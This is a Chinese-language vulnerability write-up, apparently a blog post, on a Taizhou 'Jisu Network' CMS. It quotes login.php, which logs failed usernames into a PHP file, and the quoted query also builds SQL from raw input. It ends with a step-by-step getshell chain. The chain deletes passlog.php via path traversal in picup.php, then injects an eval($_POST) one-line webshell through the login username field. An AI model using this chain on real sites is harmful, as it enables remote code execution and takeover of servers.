台州市极速网络CMS /data/log/passlog.php 任意代码执行漏洞

<p>先看根目录当中的login.php</p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">&lt;?<br style="margin: 0px; padding: 0px;"> $IS_LOGIN = true;<br style="margin: 0px; padding: 0px;"> require "./includes/headinc.php";<br style="margin: 0px; padding: 0px;"> register_shutdown_function('union_end');<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> if($action == 'logout') {<br style="margin: 0px; padding: 0px;"> $union_user = $union_pass = $gid = '';<br style="margin: 0px; padding: 0px;"> //clearcookies();<br style="margin: 0px; padding: 0px;"> //$sess_arr = array();<br style="margin: 0px; padding: 0px;"> $_SESSION[sess_arr] = $sess_arr = '';<br style="margin: 0px; padding: 0px;"> session_unregister('sess_arr');<br style="margin: 0px; padding: 0px;"> echo "&lt;meta http-equiv=\"refresh\" content=\"0;url=admin.php\"&gt;"; <br style="margin: 0px; padding: 0px;"> //header("Location:login.php");<br style="margin: 0px; padding: 0px;"> exit;<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> if($action == 'login') {<br style="margin: 0px; padding: 0px;"> $validate_t = crypt($validate, 'ckskya576');<br style="margin: 0px; padding: 0px;"> if($_SESSION[md5vali] != $validate_t)<br style="margin: 0px; padding: 0px;"> //showmessage("验证码检验失败,请返回");<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> $UNION_USER = '';<br style="margin: 0px; padding: 0px;"> $loginpass2 = md5($loginpass);<br style="margin: 0px; padding: 0px;"> $UNION_USER = $db-&gt;fetchSingle("SELECT uid AS union_uid, fig AS union_fig, username AS union_user, password AS union_pass FROM table_members WHERE username='$loginuser' &amp;&amp; password='$loginpass2'");<br style="margin: 0px; padding: 0px;"> if($UNION_USER[union_uid] &amp;&amp; !$UNION_USER[union_fig])<br style="margin: 0px; padding: 0px;"> showmessage('此帐号不可用');<br style="margin: 0px; padding: 0px;"> if ($UNION_USER) {<br style="margin: 0px; padding: 0px;"> //$qs_ts = $db-&gt;query_fetch("select * from table_sessions where username='$UNION_USER[union_user]' &amp;&amp; ip!='$yip'");<br style="margin: 0px; padding: 0px;"> //if($qs_ts[username])<br style="margin: 0px; padding: 0px;"> // showmessage('对不起, 同一帐号不能同时在多台电脑上登录');<br style="margin: 0px; padding: 0px;"> //echo "delete from table_sessions where ip='$yip' &amp;&amp; sesskey!='".session_id()."'";exit;<br style="margin: 0px; padding: 0px;"> //$db-&gt;query("delete from table_sessions where ip='$yip' &amp;&amp; sesskey!='".session_id()."'");<br style="margin: 0px; padding: 0px;"> #$db-&gt;queryDb("update table_members set loginnum=loginnum+1,lastlogin='".time()."' where uid=$UNION_USER[union_uid]",1);<br style="margin: 0px; padding: 0px;"> //union_setcookie("union_user_", $UNION_USER['union_user']);<br style="margin: 0px; padding: 0px;"> //union_setcookie("union_pass_", $UNION_USER['union_pass']);<br style="margin: 0px; padding: 0px;"> }else{<br style="margin: 0px; padding: 0px;"> $errorlog = "$loginuser\t".substr($loginpass, 0, 2);<br style="margin: 0px; padding: 0px;"> for($i = 3; $i &lt; strlen($loginpass); $i++) {<br style="margin: 0px; padding: 0px;"> $errorlog .= "*";<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> $errorlog .= substr($loginpass, -1)."\t$yip\t$timestamp\n";<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> @$fp = fopen("./data/log/passlog.php", "a");<br style="margin: 0px; padding: 0px;"> @flock($fp, 3);<br style="margin: 0px; padding: 0px;"> @fwrite($fp, $errorlog);<br style="margin: 0px; padding: 0px;"> @fclose($fp);<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> //clearcookies();<br style="margin: 0px; padding: 0px;"> }</code></pre><p><br><br><br><br>其中的</p><pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">$errorlog = "$loginuser\t".substr($loginpass, 0, 2);<br style="margin: 0px; padding: 0px;"> for($i = 3; $i &lt; strlen($loginpass); $i++) {<br style="margin: 0px; padding: 0px;"> $errorlog .= "*";<br style="margin: 0px; padding: 0px;"> }<br style="margin: 0px; padding: 0px;"> $errorlog .= substr($loginpass, -1)."\t$yip\t$timestamp\n";<br style="margin: 0px; padding: 0px;"> <br style="margin: 0px; padding: 0px;"> @$fp = fopen("./data/log/passlog.php", "a");<br style="margin: 0px; padding: 0px;"> @flock($fp, 3);<br style="margin: 0px; padding: 0px;"> @fwrite($fp, $errorlog);<br style="margin: 0px; padding: 0px;"> @fclose($fp);</code></pre><p><br><br>其中登录失败就直接将错误的用户名和过滤的密码写到data/log/passlog.php当中了。。。<br><br>你想想，这是不是任意代码写入呢？？<br><br>这是赤裸裸让你写恶意代码进去啊？ 是不是可以直接写一句话呢？ 当然是可以的<br><br>例如你用户名处填&lt;?php phpinfo();?&gt; 密码随便输 到时候你访问下data/log/passlog.php就知道是否执行了。<br><br>不过一般很多有错误登录的记录，所以这个文件有错误，导致不能马上执行，但是你想到过我前一蛋么？？？？<br><br><br><br>直接任意文件删除<br><br><br><br>getshell步骤如下（千万别做坏事，后果自负）<br><br><br><br>1、先访问如：http://XXX.COM/picup.php?action=del&amp;pic=../data/log/passlog.php<br><br>2、然后访问 http://XXX.COM/login.php<br><br>用户名填：&lt;?php phpinfo();eval($_POST[XXX]);?&gt;<br><br>密码：3333333<br><br>3、访问： <a href="http://XXX.COM/data/log/passlog.php" rel="nofollow">http://XXX.COM/data/log/passlog.php</a> 即为shell 密码就是XXX<br><br><br></p>